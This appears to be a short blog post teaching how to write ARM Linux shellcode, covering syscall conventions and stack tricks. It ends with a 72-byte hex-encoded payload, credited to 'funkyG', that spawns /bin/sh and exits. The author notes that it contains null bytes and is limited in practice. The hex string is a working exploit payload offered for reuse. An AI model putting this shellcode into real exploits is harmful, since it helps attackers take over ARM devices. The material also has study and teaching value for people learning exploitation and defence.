It is hard to find a very simple ARM shellcode. So I decided to make my own ARM shellcode.

ARM is becoming more and more popular architecture as the number of smart phones and 'net books' are expanding. Don't forget! iPhone and Nokia tablets are also running on ARM. :D

So what is the most important thing to consider to generate ARM shellcode?

First, the linux system call in ARM is little bit different from the x86 system call. Namely, the system call number is stored in r7 register instead of r0 register. (eax register can be considered as r0 in ARM). Thus, the arguments are stored in r0, r1, ... in turn.

Second, we need some trick to load 32bit immediate value into a memory address in ARM. Here, I am using four sequential arm instructions to push 32bit immediate into stack. Note that the exclamation mark in ARM assembly code means that the index operation is performed before applying the real instruction. For example, str r2, [r3, #-4]!  means: store r2 value to the ptr {r3-4} and r3 = r3 -4.

With the above facts in mind, I will present my own ARM shellcode here !!
This is just a simple example, and it contains null characters. So not applicable in most of the real cases. :)

 (ARM shellcode, execute /bin/sh and call exit) (72 byte)  
 // by funkyG  
 "\x00\x00\x20\xe0\x01\x10\x21\xe0\x02\x20\x22\xe0\x04\x20\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x2f\x73\x68\x04\xc0\x2d\xe5\x00\xc0\x9f\xe5\x00\x00\x00\xea\x2f\x62\x69\x6e\x04\xc0\x2d\xe5\x0d\x00\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef"